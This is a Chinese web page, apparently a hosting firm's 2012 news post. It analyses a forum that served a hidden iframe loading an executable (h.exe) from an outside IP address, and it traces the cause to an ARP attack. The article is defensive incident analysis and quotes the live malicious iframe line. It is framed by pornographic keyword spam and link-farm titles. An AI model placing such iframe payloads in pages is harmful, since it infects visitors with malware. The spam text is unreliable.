www一片黄-www一区-www伊人-www淫-少妇被按摩-射在老师的里面真爽

行業動態
服務器掛iframe木馬分析
發布日期:2012-11-26 閱讀次數:5660 字體大?。?a href="javascript:;" onclick="ChangeFontSize('content',16)">大

  昨日接到某論壇的求助,論壇中被掛iframe木馬,當訪問論壇時發現每個頁面的置頂有個iframe木馬,代碼如下<iframe src= http://222.113.57.47:369/h.exe width=0 height=0></iframe> 360自動提示有木馬,系統會彈出一個載下h.exe的對話框。由于論壇是當天剛出現的情況,服務器中就放置了一個論壇,分析有可能有以下幾種情況。

  1.  論壇被攻擊
  2.  IIS被置入木馬
  3.  ARP攻擊

  針對第一種情況找到論壇中改過的文件與模板,并未發現相關被篡改的內容,第一種情況排除。接下來接以下兩種思路來尋找解決方法,在論壇中新建兩個文件,一個是1.html、一個是1.php 無需輸入內容。通過論壇網址訪問  網址/1.html 訪問此頁面沒發現異常、訪問1.php發現被自動掛馬,也就是說當運行PHP的文件時會自動掛馬,那么IIS被置入木馬的可能情就大些,(IIS被置入木馬分析:如PHP解析的文件被篡改,也會出現以上的情況)按IIS的配置進行查找也未發現問題。

  懷疑可能是服務器所在的局域網或網絡有ARP攻擊,從網上下載一個ARP防火墻后重啟服務器,發現問題解決,每個頁面中已經沒有iframe的木馬。訪問論壇首頁和原建立的1.php頁面也已正常。但訪問論壇子頁時360仍提示有木馬,但子頁的代碼已無iframe的內容。這種情況可能是論壇訪問過大,多用戶同時訪問子頁,360有云計算會將原有木馬的網站或頁面自動提交到云服務器中,以致及時清除木馬后360的云服務器還沒有反映過來才出現的誤報情況。

  在些易天科技提示服務器管理員除作好站點的安全防范外,應對服務器作相關的安全設置。安裝必要的軟件。

主站蜘蛛池模板: 国产年成美女网站视频免费看 | 韩国免费网站成人 | 黑丝套图 | 欧美日韩v| 福利片在线观看免费高清视频 | 在线 你懂| 九九亚洲综合精品自拍 | 精品卡1卡2卡三卡免费网站 | 国产精品二区页在线播放 | 国内精品免费视频精选在线观看 | 国产日韩视频 | 91网站网站网站在线 | 天天做日日爱 | 亚洲综合激情六月婷婷在线观看 | 亚洲综合精品成人 | 欧美a视频在线观看 | 精品欧美成人高清视频在线观看 | 日本韩国欧美一区 | 97国产在线播放 | 日本欧美不卡一区二区三区在线 | 九九精品国产99精品 | 亚洲国产精品第一区二区三区 | 免费狼人久久香蕉网 | 成人激情开心网 | 久久青青成人亚洲精品 | 国产高清视频一区二区 | 最近2019年中文字幕一页 | 日本三级视频在线观看 | 国产成人h片视频在线观看 国产成人lu在线视频 | 欧美18videosex性欧 | 国产一区高清视频 | 成人免费观看在线网址 | 91丝瓜视频最新版 | 高h辣肉各种姿势爽文bl | 韩国伦理片在线看免 | 欧美日韩国产在线一区 | 免费簧网站永久在线播放国产 | 边做边叫床的大尺度床戏欧美 | jizzjizz日本老师 | 国产无套在线观看视频 | 久久久国产精品网站 |